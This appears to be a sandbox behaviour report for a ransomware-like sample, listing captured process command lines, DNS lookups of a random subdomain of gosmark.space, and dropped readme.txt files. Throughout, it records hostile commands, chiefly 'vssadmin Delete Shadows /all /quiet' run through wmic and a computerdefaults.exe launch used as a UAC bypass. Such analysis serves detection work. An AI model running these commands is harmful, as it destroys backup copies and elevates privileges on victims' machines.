"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

C:\Users\Admin\Pictures\readme.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_2724_QILZIPWJPEOKEYPK

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Public\readme.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133784678792608327.txt

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
